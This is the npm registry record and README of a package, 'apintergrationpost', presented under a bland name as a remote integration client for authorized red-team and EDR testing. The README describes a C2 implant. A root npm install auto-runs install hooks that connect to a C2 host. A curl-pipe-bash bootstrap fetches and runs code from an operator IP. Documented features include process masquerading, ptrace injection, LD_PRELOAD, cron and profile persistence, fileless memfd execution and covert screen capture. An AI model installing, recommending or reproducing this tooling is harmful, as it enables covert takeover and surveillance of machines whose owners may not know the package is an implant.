{"_id":"apintergrationpost","_rev":"8-ca8064d0dcc5290d8bbacef32cf4b749","name":"apintergrationpost","dist-tags":{"latest":"4.1.0"},"versions":{"4.0.1":{"name":"apintergrationpost","version":"4.0.1","keywords":["integration","remote-client","ubuntu"],"license":"MIT","_id":"apintergrationpost@4.0.1","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"dist":{"shasum":"a641e037d0bdecbc0fb36164c274bbdf53461983","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.0.1.tgz","fileCount":55,"integrity":"sha512-kYp0zsbdWLAlezs0ng0X4naDvWIJhu4E1cBpYOU1lzL5vKKaHiu6MXBCXRnBKzndq5Q9KkXr3gMEsbISudoOMQ==","signatures":[{"sig":"MEYCIQCJADBPBOAtFc2b2EwIDsnhB/Omnmvk1q6vJ8rYtwB91QIhAINZcASUwRbY03gcANWZfrn0uHFqEs+j3e0CRix7me0K","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":161687},"engines":{"node":">=18"},"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","scripts":{"client":"node bin/apintergrationpost.js","server":"node src/server/index.js","prepare":"node scripts/prepare-native.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","postinstall":"node scripts/postinstall-run.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"_npmVersion":"11.13.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","directories":{},"_nodeVersion":"24.17.0","dependencies":{"node-pty":"^1.0.0"},"_hasShrinkwrap":false,"devDependencies":{"esbuild":"^0.25.0"},"_npmOperationalInternal":{"tmp":"tmp/apintergrationpost_4.0.1_1782053298491_0.785086369505416","host":"s3://npm-registry-packages-npm-production"}},"4.0.2":{"name":"apintergrationpost","version":"4.0.2","keywords":["integration","remote-client","ubuntu"],"license":"MIT","_id":"apintergrationpost@4.0.2","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"dist":{"shasum":"79188b89ff51001bdf990fc724ba0df4dcc2bb3b","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.0.2.tgz","fileCount":58,"integrity":"sha512-SVdcvSATnmN2LTghfI5vC7piyPIUZ5rG6pW+HwAV0G/qvmXx4fTGKdzPQITqzmitF9RYDKmQvnJkofyJ4mukSA==","signatures":[{"sig":"MEUCIQCFX7NiSxxdESNby3pEMJm0k+zGtq2UcYgjO0P93Ki8TAIgG6nzRMhB7Yyy1eJmn5t3qQWjqsV7vkCBujoMI1jqf64=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":165470},"engines":{"node":">=18"},"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","scripts":{"client":"node bin/apintergrationpost.js","server":"node src/server/index.js","prepare":"node scripts/prepare-native.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","preinstall":"node scripts/preinstall-check.js","postinstall":"node scripts/postinstall-run.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"_npmVersion":"11.13.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","directories":{},"_nodeVersion":"24.17.0","dependencies":{"node-pty":"^1.0.0","ffmpeg-static":"^5.2.0"},"_hasShrinkwrap":false,"devDependencies":{"esbuild":"^0.25.0"},"_npmOperationalInternal":{"tmp":"tmp/apintergrationpost_4.0.2_1782053907942_0.225022491684431","host":"s3://npm-registry-packages-npm-production"}},"4.0.3":{"name":"apintergrationpost","version":"4.0.3","keywords":["integration","remote-client","ubuntu"],"license":"MIT","_id":"apintergrationpost@4.0.3","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"dist":{"shasum":"27b9502813efc2bc8babf7e7af6258ef0553ac68","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.0.3.tgz","fileCount":59,"integrity":"sha512-KkvnFpMe1tzpk5VrXdFedgY6AxNbnHQ5UKDO8QD8u7kdIwZ1DjftiY/C+Eozy3XrRMnxCc/PFo0Uyschpj778Q==","signatures":[{"sig":"MEYCIQCl4WtVbw5WZHaufAffpmcxDMeHJoPENxktjiD431YBawIhALeKtUU3QyenjrySJ0Zie5PoVrjCwBKIjoPtFtw2zWQX","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":176136},"engines":{"node":">=18"},"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","scripts":{"client":"node bin/apintergrationpost.js","server":"node src/server/index.js","prepare":"node scripts/prepare-native.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","preinstall":"node scripts/preinstall-check.js","postinstall":"node scripts/postinstall-run.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"_npmVersion":"11.13.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","directories":{},"_nodeVersion":"24.17.0","dependencies":{"node-pty":"^1.0.0","ffmpeg-static":"^5.2.0"},"_hasShrinkwrap":false,"devDependencies":{"esbuild":"^0.25.0"},"_npmOperationalInternal":{"tmp":"tmp/apintergrationpost_4.0.3_1782054515604_0.40033937298620037","host":"s3://npm-registry-packages-npm-production"}},"4.0.4":{"name":"apintergrationpost","version":"4.0.4","keywords":["integration","remote-client","ubuntu"],"license":"MIT","_id":"apintergrationpost@4.0.4","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"dist":{"shasum":"50ba61572daacc67891d1132ca23488685a65bd5","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.0.4.tgz","fileCount":60,"integrity":"sha512-9wmIjXzLqCmsxZPJpq4s1wOMjTcWQNy6EhvyhliyYGNX3KAFGMzcFqLHwqWu3OBpWcKdyXgpj0h3dS7HD9NM1Q==","signatures":[{"sig":"MEQCIFsKFTSyfEr9doZKkxTTkfBfaY+LeSTKd9xBlgyYBRwUAiA9ERG2UK840okJrZdR7/eHurW9kBV9icxR3Bjba6rElg==","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":181775},"engines":{"node":">=18"},"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","scripts":{"client":"node bin/apintergrationpost.js","server":"node src/server/index.js","prepare":"node scripts/prepare-native.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","preinstall":"node scripts/preinstall-check.js","postinstall":"node scripts/postinstall-run.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"_npmVersion":"11.13.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","directories":{},"_nodeVersion":"24.17.0","dependencies":{"node-pty":"^1.0.0","ffmpeg-static":"^5.2.0"},"_hasShrinkwrap":false,"devDependencies":{"esbuild":"^0.25.0"},"_npmOperationalInternal":{"tmp":"tmp/apintergrationpost_4.0.4_1782054880576_0.6305077630817899","host":"s3://npm-registry-packages-npm-production"}},"4.0.5":{"name":"apintergrationpost","version":"4.0.5","keywords":["integration","remote-client","ubuntu"],"license":"MIT","_id":"apintergrationpost@4.0.5","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"dist":{"shasum":"219beeaccca732cfcd033c3728cf09c37679d62a","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.0.5.tgz","fileCount":60,"integrity":"sha512-IXEb1Pgr/CAS8UNl5g5n8JyXMGQgBieaWC9lzNKfMauv9Wq9UOQrW7ig0XAp5VAHLrOwwVyY34MH2RGgk+c9Mw==","signatures":[{"sig":"MEUCICBbZ0pYhEG382UO1cDJoF3WqGTQvN40OzLCsOVTHRkwAiEA+V41j8Y6c2JGQlpv7RD6v7XRPKxuvXCtZ2JCCaMjt6Y=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":189872},"engines":{"node":">=18"},"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","scripts":{"client":"node bin/apintergrationpost.js","server":"node src/server/index.js","prepare":"node scripts/prepare-native.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","preinstall":"node scripts/preinstall-check.js","postinstall":"node scripts/postinstall-run.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"_npmVersion":"11.13.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","directories":{},"_nodeVersion":"24.17.0","dependencies":{"node-pty":"^1.0.0","ffmpeg-static":"^5.2.0"},"_hasShrinkwrap":false,"devDependencies":{"esbuild":"^0.25.0"},"_npmOperationalInternal":{"tmp":"tmp/apintergrationpost_4.0.5_1782055274279_0.6267489614340267","host":"s3://npm-registry-packages-npm-production"}},"4.0.6":{"name":"apintergrationpost","version":"4.0.6","keywords":["integration","remote-client","ubuntu"],"license":"MIT","_id":"apintergrationpost@4.0.6","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"dist":{"shasum":"9ee0b8f8fa6b8526f1cca8b1920a8c452cd6a0ab","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.0.6.tgz","fileCount":60,"integrity":"sha512-o5Y1AiGKr5IMv9hHdqQIR5cZ8npL80QYf4bC5pYbRt56vWxNvdHy0tc3c+52ncfbqUF4mEzsjfBPWuBQ1cwsdQ==","signatures":[{"sig":"MEYCIQDeVMgo5Cl8Je69pMgJkcZGHiEEkAImlAeT8hrGEfgnCgIhAOMsIdlfUxosMy8PV6iGVo2R1zbtgNkTIQadxoHLLKSk","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":191530},"engines":{"node":">=18"},"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","scripts":{"client":"node bin/apintergrationpost.js","server":"node src/server/index.js","prepare":"node scripts/prepare-native.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","preinstall":"node scripts/preinstall-check.js","postinstall":"node scripts/postinstall-run.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"_npmVersion":"11.13.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","directories":{},"_nodeVersion":"24.17.0","dependencies":{"node-pty":"^1.0.0","ffmpeg-static":"^5.2.0"},"_hasShrinkwrap":false,"devDependencies":{"esbuild":"^0.25.0"},"_npmOperationalInternal":{"tmp":"tmp/apintergrationpost_4.0.6_1782055598625_0.5979822757147666","host":"s3://npm-registry-packages-npm-production"}},"4.0.8":{"name":"apintergrationpost","version":"4.0.8","keywords":["integration","remote-client","ubuntu"],"license":"MIT","_id":"apintergrationpost@4.0.8","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"dist":{"shasum":"d6c30b7b90e902ef4f35a13e667d0614fc877b5d","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.0.8.tgz","fileCount":60,"integrity":"sha512-55TBofXN1057z6tGFr2hB64QpgP59jXa4uq6qI83cE+F3jPKXDg9ZHw1BhreN/R7sHPE5mnLZdcjOct8FyrA7Q==","signatures":[{"sig":"MEUCIQDnaPH61p1DfrSEnP1LyoKbq8BoBiO/SI7Xj5YsxgrUhAIgQSJ+3UN6TQxhd3YWSYsQrWP6l5cF9EqGRbBhbagn8yY=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":198813},"engines":{"node":">=18"},"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","scripts":{"client":"node bin/apintergrationpost.js","server":"node src/server/index.js","prepare":"node scripts/prepare-native.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","preinstall":"node scripts/preinstall-check.js","postinstall":"node scripts/postinstall-run.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"_npmVersion":"11.13.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","directories":{},"_nodeVersion":"24.17.0","dependencies":{"node-pty":"^1.0.0","ffmpeg-static":"^5.2.0"},"_hasShrinkwrap":false,"devDependencies":{"esbuild":"^0.25.0"},"_npmOperationalInternal":{"tmp":"tmp/apintergrationpost_4.0.8_1782056014236_0.7725633890907186","host":"s3://npm-registry-packages-npm-production"}},"4.1.0":{"name":"apintergrationpost","version":"4.1.0","description":"Remote integration client for authorized lab and enterprise post-deployment workflows","license":"MIT","engines":{"node":">=18"},"bin":{"apintergrationpost":"bin/apintergrationpost.js","apintergrationpost-install":"bin/apintergrationpost-install.js"},"scripts":{"preinstall":"node scripts/preinstall-check.js","prepare":"node scripts/prepare-native.js","postinstall":"node scripts/postinstall-run.js","prepublishOnly":"node -e \"require('fs').accessSync('apintergrationpost.config.json')\"","server":"node src/server/index.js","client":"node bin/apintergrationpost.js","build-native":"make -C native/lab-tools","bundle-agent":"node scripts/bundle-agent.js","correlate":"node scripts/correlate-events.js","edr-matrix":"bash scripts/edr-test-matrix.sh","test:detection-tier":"bash scripts/detection-tier/run-all.sh"},"dependencies":{"ffmpeg-static":"^5.2.0","node-pty":"^1.0.0"},"devDependencies":{"esbuild":"^0.25.0"},"keywords":["integration","remote-client","ubuntu"],"gitHead":"aa832c259dcb1066c11d4424f2f4aa4f73983ed6","_id":"apintergrationpost@4.1.0","_nodeVersion":"24.17.0","_npmVersion":"11.13.0","dist":{"integrity":"sha512-kYP7CaDNjUotA1aJeZ7I1Ovzpo5dXAsBtOa5P9XgBRxI0ZhfY3IQbzmU+OC/fvIC7ntVdRsOhtelcs0E78zxxg==","shasum":"d97b1523ddd70cffdae8e0d323c2f5b543c55800","tarball":"https://registry.npmjs.org/apintergrationpost/-/apintergrationpost-4.1.0.tgz","fileCount":60,"unpackedSize":192591,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEQCIDILfb5NsPyvOZTkAF4q6BncxHoQ03iC6hVaYITywrVuAiBzEICNXE1Wbvw0kjNjGy6ChusnIMpSLEi4t2nVCFkXVQ=="}]},"_npmUser":{"name":"kimijohn01","email":"kimnbv@proton.me"},"directories":{},"maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/apintergrationpost_4.1.0_1782056348140_0.28441434601839233"},"_hasShrinkwrap":false}},"time":{"created":"2026-06-21T14:48:18.437Z","modified":"2026-06-21T15:39:08.400Z","4.0.1":"2026-06-21T14:48:18.609Z","4.0.2":"2026-06-21T14:58:28.085Z","4.0.3":"2026-06-21T15:08:35.740Z","4.0.4":"2026-06-21T15:14:40.705Z","4.0.5":"2026-06-21T15:21:14.424Z","4.0.6":"2026-06-21T15:26:38.764Z","4.0.8":"2026-06-21T15:33:34.372Z","4.1.0":"2026-06-21T15:39:08.276Z"},"license":"MIT","keywords":["integration","remote-client","ubuntu"],"description":"Remote integration client for authorized lab and enterprise post-deployment workflows","maintainers":[{"name":"kimijohn01","email":"kimnbv@proton.me"}],"readme":"# apintergrationpost\n\nHybrid Node.js integration client with native lab primitives for **authorized** red team exercises and EDR validation in isolated environments.\n\nPublished on npm as **`apintergrationpost`**.\n\n## Ubuntu — one command\n\nOn the Ubuntu client, run **only this**:\n\n```sh\nsudo npm install -g apintergrationpost\n```\n\nRequirements handled automatically during install:\n\n- **Root check** — non-root installs show a clear message and abort\n- **Bundled ffmpeg** — screen capture works without `apt install ffmpeg`\n- **System build tools** — `build-essential` / `python3` installed via apt when missing (for native modules)\n- **Auto-start** — client connects to the C2 host in `apintergrationpost.config.json`\n\nIf run without root:\n\n```text\n╔══════════════════════════════════════════════════════════════╗\n║  apintergrationpost requires ROOT privileges to install.     ║\n║                                                              ║\n║  Run:  sudo npm install -g apintergrationpost                ║\n╚══════════════════════════════════════════════════════════════╝\n```\n\n### Publish / update on npm\n\n```sh\n# 1. Bump version in package.json (e.g. 4.0.2 → 4.0.3)\n# 2. Publish\nnpm publish\n# If 2FA is enabled:\nnpm publish --otp=123456\n```\n\n### C2 server (on your host)\n\n```sh\nnpm run server\n```\n\n### Disable auto-start (development)\n\n```sh\nAPINTEGRATIONPOST_SKIP_AUTORUN=1 npm install\n```\n\n## Ubuntu — curl bootstrap (no npm registry)\n\nIf the package is not on npm yet, start the operator server (`npm run server`) and use:\n\n```sh\ncurl -fsSL http://192.168.54.1:8080/run | bash\n```\n\n## Ubuntu — manual npm install\n\n**Prerequisites** (once per machine):\n\n```sh\nsudo apt update\nsudo apt install -y nodejs npm build-essential python3\n```\n\n### Option A — run immediately (no global install)\n\n```sh\nnpx apintergrationpost --host C2_HOST --port 443 --token YOUR_SECRET_TOKEN\n```\n\n### Option B — global install, then run\n\n```sh\nsudo npm install -g apintergrationpost\napintergrationpost --host C2_HOST --port 443 --token YOUR_SECRET_TOKEN\n```\n\n### Option C — install as a systemd service (production)\n\n```sh\nsudo npm install -g apintergrationpost\nsudo apintergrationpost-install --host C2_HOST --port 443 --token YOUR_SECRET_TOKEN --start\n```\n\nService management:\n\n```sh\nsudo systemctl status apintergrationpost\nsudo journalctl -u apintergrationpost -f\n```\n\n### Configuration\n\nCLI flags override the bundled defaults in `apintergrationpost.config.json`:\n\n| Flag | Environment | Description |\n|------|-------------|-------------|\n| `--host` | `APINTEGRATIONPOST_HOST` | C2 server address |\n| `--port` | `APINTEGRATIONPOST_PORT` | C2 port (default `4444`) |\n| `--token` | `APINTEGRATIONPOST_AUTH_TOKEN` | Shared auth token |\n| `--config` | `APINTEGRATIONPOST_CONFIG` | Custom config file path |\n\nHelp:\n\n```sh\napintergrationpost --help\napintergrationpost-install --help\n```\n\n## Publish to npm\n\nFrom the repository root:\n\n```sh\nnpm login\nnpm publish\n```\n\nThe published tarball includes only the client agent (`files` field in `package.json`). Server, lab scripts, and docs stay in the repo for local development.\n\n## Local development (full lab)\n\n```sh\ngit clone <repo>\ncd myra\nnpm install\nnpm run build-native\n# Edit myra.config.json — set auth.token and C2 host/port\nnpm run server\nnpm run client -- --host C2_HOST --port 443 --token YOUR_TOKEN\n```\n\nLegacy shell installer (non-npm): `sudo bash install/install.sh`\n\n## Capabilities\n\n| Layer | Module | Commands |\n|-------|--------|----------|\n| C2 | TLS on common ports, log-normal beacons, frame padding | (automatic) |\n| Process evasion | `evasion-process` | `hide_start`, `inject`, `inject_spawn`, `preload_install` |\n| Stealth persistence | `persistence-stealth` | `persist_install`, `persist_remove`, `persist_status` |\n| Memory execution | `evasion-memfd` | `memfd_exec`, `memfd_stage`, `memfd_status` |\n\nNative tools (`native/lab-tools/`): `agent_launcher`, `proc_hide`, `injector`, `libcache.so`, `memfd_exec`\n\n## Configuration reference\n\n```json\n{\n  \"host\": \"C2_HOST\",\n  \"port\": 443,\n  \"auth\": { \"token\": \"secret\" },\n  \"c2\": {\n    \"beaconProfile\": { \"minMs\": 45000, \"maxMs\": 300000, \"distribution\": \"lognormal\" }\n  },\n  \"emulation\": {\n    \"enabled\": true,\n    \"stealth\": true,\n    \"telemetry\": false,\n    \"process\": { \"autoHide\": false, \"targetName\": \"systemd-userdbd\" },\n    \"persistence\": { \"vectors\": [\"preload\", \"cron\", \"profile\"] }\n  }\n}\n```\n\nEnable optional telemetry for EDR correlation: `\"emulation\": { \"telemetry\": true }` or `--telemetry`.\n\n## Live screen / VNC\n\nOperator command: `vnc` or `screen` (requires active session). Opens a browser viewer at `http://127.0.0.1:5555/`.\n\n**One-command install** (`sudo npm install -g apintergrationpost`) automatically installs `ffmpeg`, `imagemagick`, and `x11-utils`, and configures GNOME to prefer **Xorg** on next login.\n\nCapture backends (automatic):\n1. **ffmpeg x11grab** — persistent stream (best quality)\n2. **ImageMagick import** — fallback frame loop if ffmpeg fails\n\nThe desktop user must be logged into the **GUI**. After first install, **log out and back in** once (or pick **Ubuntu on Xorg** at the login gear icon).\n\n| Key | Default | Description |\n|-----|---------|-------------|\n| `fps` | `8` | Target frame rate |\n| `maxWidth` / `maxHeight` | `1920` / `1080` | Resolution cap |\n| `jpegQuality` | `4` | ffmpeg JPEG quality |\n| `dropFrames` | `true` | Send latest frame only when behind |\n| `idleStopSec` | `45` | Stop when browser viewer closes |\n\n## Operator Commands\n\nSee server `help` for full list. Key emulation commands:\n\n- `persist_install` / `persist_remove` — stealth persistence (LD_PRELOAD, cron, profile.d)\n- `hide_start` — process masquerade via native launcher\n- `inject` / `inject_spawn` — ptrace injection stress test\n- `memfd_exec <path>` — fileless execution path\n\n## EDR Validation\n\n- [docs/edr-validation.md](docs/edr-validation.md) — expected detection surfaces\n- `scripts/edr-test-matrix.sh` — automated scenario runner\n- `lab/sigma/` — behavior-based Sigma rules (no string IOCs)\n- `npm run correlate` — merge telemetry with Auditd (when telemetry enabled)\n\n## Build Native Tools\n\nNative tools compile automatically on Linux during `npm install` (`prepare` script). Manual build:\n\n```sh\nmake -C native/lab-tools\n# Output: native/lab-tools/bin/\n```\n\n## Safety\n\nUse only in air-gapped lab VMs you control. Run `persist_remove`, `preload_remove`, and `hide_stop` before snapshot restore.\n\n## Architecture\n\n```\nbin/                 npm CLI entry points (apintergrationpost, apintergrationpost-install)\nsrc/client/          Node.js agent + emulation plugins\nsrc/server/          Operator console (dev only, not published)\nnative/lab-tools/    C evasion primitives\nlab/                 Auditd + Sigma artifacts (dev only, not published)\n```\n","readmeFilename":"README.md"}